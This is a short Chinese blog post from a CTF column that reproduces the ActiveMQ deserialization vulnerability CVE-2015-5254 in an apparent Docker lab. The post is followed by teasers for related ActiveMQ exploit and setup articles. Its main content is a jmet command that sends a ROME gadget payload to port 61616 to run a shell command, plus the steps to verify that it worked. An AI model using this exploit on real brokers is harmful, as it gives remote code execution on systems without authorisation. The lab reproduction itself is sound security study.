ActiveMQ 反序列化漏洞(CVE-2015-5254)

最新推荐文章于 2024-10-31 11:37:05 发布
最新推荐文章于 2024-10-31 11:37:05 发布
阅读量140 收藏
点赞数
分类专栏: CTF 文章标签: activemq
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39422729/article/details/126340030
版权 
# 执行语句
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616


#查看消息队列
http://your-ip:8161/admin/browse.jsp?JMSDestination=event

#进入容器,执行:
docker-compose exec activemq bash
#可见 /tmp/success 已成功创建,说明漏洞利用成功。

太高级了,简直简单的不要不要的!!!!!!!

又搞定了一个大事儿。

科尔沁的风
关注
专栏目录
漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 653
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
漏洞复现】---- ActiveMQ 反序列化漏洞CVE-2015-5254
qq_43168364的博客
09-04 723
一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 漏洞影响的版本为:Apache ActiveMQ 5.13.0之前的版本。 二、漏洞环境准备 pull下来内容 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递
vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞
雷根瓦尔德
11-08 1843
Vulhub靶场已经搭建完成,可以正式进行渗透测试的练习了。 本篇的内容是完成ActiveMQ任意文件写入漏洞CVE-2016-3088) ActiveMQ介绍:Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 本篇我就先进行一次完整的实验过程,然后再按照...
ActiveMQ任意文件写入漏洞分析溯源
ST0new的博客
09-04 1146
title: ActiveMQ任意文件写入漏洞分析溯源 categories: WEB安全 tags: http方法利用 文章目录墨者学院WEB安全ActiveMQ任意文件写入漏洞分析溯源ActiveMQ 简介漏洞复现解决方案参考链接 墨者学院 WEB安全 ActiveMQ任意文件写入漏洞分析溯源 ActiveMQ 简介 ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中...
ActiveMQ简单介绍
xmh_sxh_1314的博客
09-19 648
消息通信的规范JMS,我们这篇博文介绍一款开源的JMS具体实现——ActiveMQActiveMQ是一个易于使用的消息中间件。 消息中间件 我们简单的介绍一下消息中间件,对它有一个基本认识就好,消息中间件(MOM:Message Orient middleware)。 消息中间件有很多的用途和优点: 将数据从一个应用程序传送到另一个应用程序,或者从软件的一个模块传送到另外一个模块; 负责建立网络通信的通道,进行数据的可靠传送。 保证数据不重发,不丢失 能够实现跨平台操作,能够为不同操作系统上的软件集成.
ActiveMQ漏洞利用
打代码的小女孩
11-04 667
背景简述 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了...
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2946
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
qq_32642035的博客
10-17 1259
ActiveMQ 反序列化漏洞 (CVE-2015-5254)漏洞复现
[应用安全]之ActiveMQ漏洞利用方法总结
zhang8907xiaoyue的博客
03-22 7264
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。ActiveMQ 是一个完全支持JMS1.1和J2EE 1.4规范的 JMS Provider实现,尽管JMS 应用介绍 Apache ActiveMQ是Apache软件基金会所研发的开放源代码
ActiveMQ漏洞总结
qq_42176207的博客
05-08 7691
ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 Ac
Apache ActiveMQ漏洞利用总结
qq_42430287的博客
04-24 1933
Apache ActiveMQ漏洞利用总结
ActiveMQ漏洞复现(不安全的http方法具体利用)
嘻嘻哈哈
06-22 2853
1、搭建ActiveMQ环境 环境准备 jre安装及环境变量的配置: https://blog.csdn.net/tiantang_1986/article/details/53894947 下载有漏洞版本的ActiveMQ(我用的5.7.0) http://activemq.apache.org/download-archives.html 解压后进入bin目录,发...
ActiveMQ系列漏洞汇总
热门推荐
AaronLuo
06-06 1万+
ActiveMQ 反序列化漏洞CVE-2015-5254) Apache ActiveMQ是美国Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring FrameWork。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 信息搜集 nmap -sS -T5 -n
docker花里胡哨搭建ActiveMQ及启用延时队列
kaleldo的博客
12-26 673
下载MQ 为什么有这篇文章呢?因为公司想在直播中的房间定时推送消息,因此想到用MQ的延时队列,定时推送消息.嗯,先用单机版进行试验 假如我们在腾讯云租了个便宜虚拟机,并在上面装好docker和docker-compose docker-compose.yml version: '3' services: #activemq容器 myactivemq: #使用的镜像 ...
如何正确进行activemq服务搭建及性能调优?
最新发布
梦在硅谷的博客
10-31 649
ActiveMQ是Apache软件基金会开发的一个开源消息代理,支持多种消息协议,包括JMS(Java Message Service)、AMQP、MQTT等。它提供了可靠的消息传递、持久性、事务支持等功能。
Linux下安装ActiveMQ-CPP
燃犀的博客
10-31 277
参考文章。
linux 运行 activemq,Linux 安装 ActiveMQ 服务器详解
燃犀的博客
10-31 119
这个需要注意的是要注意jave环境的版本。建议不要下载太新版本的服务器。需要根据自己的java环境版本来。也许做C++的会问,为什么我做一个C++的项目要用到java环境,这个我刚开始也很懵。喉咙才知道是运行这个服务器需要Java环境。Linux下安装和更新java环境应该都不难。点击past releases 就可以选择以前的版本了。然后就可以安装参考的文章去配置和运行它了。
ActiveMQ 反序列化漏洞
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值